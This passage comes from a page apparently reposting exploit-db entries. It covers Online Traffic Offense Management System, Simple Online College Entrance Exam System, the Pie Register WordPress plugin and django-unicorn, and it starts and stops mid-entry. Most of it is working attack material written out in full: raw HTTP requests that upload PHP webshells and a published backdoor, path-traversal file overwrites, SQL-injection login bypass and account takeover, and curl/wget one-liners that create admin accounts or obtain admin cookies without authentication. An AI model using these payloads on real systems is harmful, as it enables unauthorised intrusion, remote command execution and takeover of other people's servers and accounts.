of 20 Sec in response. 4) python sqlmap.py -r request.txt -p searchifsccode --dbs 5) We can retrieve all databases using above sqlmap command
  14. HireHackking

    Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### RCE - Remote Code Execution # All requests can be sent by both an authenticated and a non-authenticated user # RCE - we can exploit the RCE vulnerability in several ways: * Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver * System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info * User profile edit avatar - http://localhost/traffic_offense/admin/?page=user * Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user * Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2 ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 # Request send as Unauthenticated user POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 Content-Length: 1184 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=user/manage_user Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="id" -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="firstname" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="lastname" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="username" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="password" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="type" 1 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="img"; filename="cmd.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> </pre> </BODY></HTML> -----------------------------210106920639395210803657370685-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 07:59:24 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 ----------------------------------------------------------------------------------------------------------------------- # The file was uploaded to the uploads directory # Request to list files in uploads\ GET /traffic_offense/uploads/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:06:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 2139 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /traffic_offense/uploads</title> </head> <body> <h1>Index of /traffic_offense/uploads</h1> <table> <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr> <tr><th colspan="5"><hr></th></tr> <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a> </td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a> </td><td align="right">2021-08-19 09:24 </td><td align="right"> 11K</td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58 </td><td align="right">5.2K</td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a> </td><td align="right">2021-10-07 07:31 </td><td align="right">3.4K</td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a> </td> [...] ----------------------------------------------------------------------------------------------------------------------- # Request to webshell GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:10:10 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 810 Connection: close Content-Type: text/html; charset=UTF-8 <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> Volume in drive C has no label. Volume Serial Number is 283C-C6A0 Directory of C:\xampp\htdocs\traffic_offense\uploads 07.10.2021 10:09 <DIR> . 07.10.2021 10:09 <DIR> .. 19.08.2021 09:24 11ÿ426 1629336240_avatar.jpg 20.08.2021 08:58 5ÿ288 1629421080_tl-logo.png 07.10.2021 07:31 3ÿ451 1633584660_xss.svg 07.10.2021 09:59 252 1633593540_cmd.php 07.10.2021 10:02 252 1633593720_cmd.php 07.10.2021 09:02 <DIR> drivers 5 File(s) 20ÿ669 bytes 3 Dir(s) 86ÿ494ÿ085ÿ120 bytes free </pre> </BODY></HTML> ----------------------------------------------------------------------------------------------------------------------- ## Example 2 # Webshell as System Logo and next webshell as Potal Cover in System Information page # Request POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833 Content-Length: 3176 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=system_info Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="name" Online Traffic Offense Management System - PHP -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="short_name" OTOMS - PHP -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="about_us" <p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p> -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="img"; filename="cmd.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> </pre> </BODY></HTML> -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="cover"; filename="list.php" Content-Type: application/octet-stream <?php if($_GET['file']) { $fichero=$_GET['file']; } else { $fichero="/"; } if($handle = @opendir($fichero)) { while($filename = readdir($handle)) { echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>"; } closedir($handle); } else { echo "FILE: " . $fichero . "<br><hr><pre>"; $fp = fopen($fichero, "r"); $buffer = fread($fp, filesize($fichero)); echo $buffer; fclose($fp); } ?> -----------------------------339921602532596419562348365833-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:21:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 ----------------------------------------------------------------------------------------------------------------------- # The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php ## Example 3 # Webshell as photo in driver list page # Request POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204 Content-Length: 2148 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="id" -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="license_id_no" vvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="lastname" vvvvvvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="firstname" vvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="middlename" vvvvvvvvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="dob" 2021-10-07 -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="present_address" vvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="permanent_address" vvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="civil_status" Single -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="nationality" vvvvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="contact" vvvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="license_type" Student -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="image_path" -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="img"; filename="simple-backdoor.php" Content-Type: application/octet-stream <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd <!-- http://michaeldaw.org 2006 --> -----------------------------12210274961293066124133837204-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:35:21 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- # Request to webshell GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:39:15 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 95 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <pre>desktop-uhrf0c6\hubert </pre>
  15. HireHackking

    Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass # Date: 07.10.2021 # Exploit Author: Mevlüt Yılmaz # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Simple Online College Entrance Exam System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/entrance_exam/admin/login.php 2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC POST /entrance_exam/Actions.php?a=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 45 Origin: http://localhost Connection: close Referer: http://localhost/entrance_exam/admin/login.php Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n username=admin'+or+'1'%3D'1&password=anything
  16. HireHackking

    Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Privilage escalation # All requests can be sent by both an authenticated and a non-authenticated user # The vulnerabilities in the application allow for: * Reading any PHP file from the server * Saving files to parent and child directories and overwriting files in server * Performing operations by an unauthenticated user with application administrator rights ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 - Reading any PHP file from the server Example vuln scripts: http://localhost/traffic_offense/index.php?p= http://localhost/traffic_offense/admin/?page= # Request reading rrr.php file from other user in serwer GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:09:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close [...] </br></br>Hacked file other user in serwer!</br></br> [...] ----------------------------------------------------------------------------------------------------------------------- ## Example 2 - Saving files to parent and child directories and overwriting files in server # Request to read file GET /traffic_offense/index.php HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:30:56 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15095 <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Online Traffic Offense Management System - PHP</title> [...] ----------------------------------------------------------------------------------------------------------------------- # Request to overwrite file index.php in main directory webapp POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403 Content-Length: 1928 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4 Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="id" 5/../../../index -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="license_id_no" GBN-1020061 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="lastname" Blake -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="firstname" Claire -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="middlename" C -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="dob" 1992-10-12 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="present_address" Sample Addss 123 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="permanent_address" Sample Addess 123 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="civil_status" Married -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="nationality" Filipino -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="contact" 09121789456 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="license_type" Non-Professional -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="image_path" uploads/drivers/ -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="img"; filename="fuzzdb.php" Content-Type: image/png <?php echo "Hacked other client files in this hosting!"; ?> -----------------------------329606699635951312463334027403-- # New file have extention as this write filename="fuzzdb.php" # New file have name and locate 5/../../../index we can save file in other directory ;) # Line must start digit # We can rewrite config files ----------------------------------------------------------------------------------------------------------------------- # Respopnse HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:38:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- # Request to read file index.php again GET /traffic_offense/index.php HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:42:17 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 42 Connection: close Content-Type: text/html; charset=UTF-8 Hacked other client files in this hosting! ----------------------------------------------------------------------------------------------------------------------- ## Example 4 - Performing operations by an unauthenticated user with application administrator rights # The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable # Request adding new admin user to application by sending a request by an authorized user POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 Content-Length: 949 Origin: http://localhost Connection: close Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="id" 21 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="firstname" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="lastname" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="username" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="password" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="type" 1 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="img"; filename="aaa.php" Content-Type: application/octet-stream <?php phpinfo(); ?> -----------------------------210106920639395210803657370685-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:50:36 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 # The request worked fine, log into the app using your hack account
  17. HireHackking

    Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation # Date: 07.10.2021 # Exploit Author: Amine ismail @aminei_ # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Unauthenticated admin creation Unauthenticated admin creation: Request: POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1 Host: 127.0.0.1 Content-Length: 42 id=&fullname=admin2&username=admin2&type=1 PoC to create an admin user named exploitdb and password exploitdb: curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'
  18. HireHackking

    WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated) # Google Dork: inurl:/plugins/pie-register/ # Date: 08.10.2021 # Exploit Author: Lotfi13-DZ # Vendor Homepage: https://wordpress.org/plugins/pie-register/ # Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip # Version: <= 3.7.1.4 # Tested on: ubuntu Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin). Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
  19. HireHackking

    Simple Online College Entrance Exam System 1.0 - Account Takeover

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover # Date: 07.10.2021 # Exploit Author: Amine ismail @aminei_ # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Unauthenticated password change leading to account takeover Explanation: By setting the parameter old_password as array, the MD5 function on it returns null, so md5($old_password) == $_SESSION['password'] since we have no session, thus bypassing the check, after that we can use SQLI and inject our custom data. Request: POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 129 id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test Vulnerable code in Actions.php: function update_credentials(){ extract($_POST); $data = ""; foreach($_POST as $k => $v){ if(!in_array($k,array('id','old_password')) && !empty($v)){ if(!empty($data)) $data .= ","; if($k == 'password') $v = md5($v); $data .= " `{$k}` = '{$v}' "; } } ... if(!empty($password) && md5($old_password) != $_SESSION['password']){ $resp['status'] = 'failed'; $resp['msg'] = "Old password is incorrect."; }else{ $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'"; @$save = $this->query($sql); PoC that changes the password and username of user 'admin' to 'exploitdb': curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials'
  20. HireHackking

    django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS) # Date: 10/7/21 # Exploit Author: Raven Security Associates, Inc. (ravensecurity.net) # Software Link: https://pypi.org/project/django-unicorn/ # Version: <= 0.35.3 # CVE: CVE-2021-42053 django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests. Step 1: Go to www.django-unicorn.com/unicorn/message/todo Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet). POC: POST /unicorn/message/todo HTTP/2 Host: www.django-unicorn.com Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z Content-Length: 258 Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94"" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: application/json X-Requested-With: XMLHttpRequest X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z Sec-Ch-Ua-Platform: ""Linux"" Origin: https://www.django-unicorn.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: 